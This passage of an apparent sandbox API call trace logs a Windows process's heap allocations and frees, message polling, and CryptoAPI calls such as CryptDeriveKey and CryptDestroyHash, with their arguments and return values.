0x2e542b0 [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0201.246] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0201.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0201.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0201.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0201.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0201.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0201.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0201.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b48 [0201.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0201.251] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87410, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0201.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0201.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0201.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0201.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0201.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0201.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0201.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0201.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0201.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0201.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0201.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.255] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0201.256] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0201.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0201.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0201.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0201.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a48 [0201.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0201.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0201.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0201.258] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.259] CryptDestroyHash (hHash=0xa87410) returned 1 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0201.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0201.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) 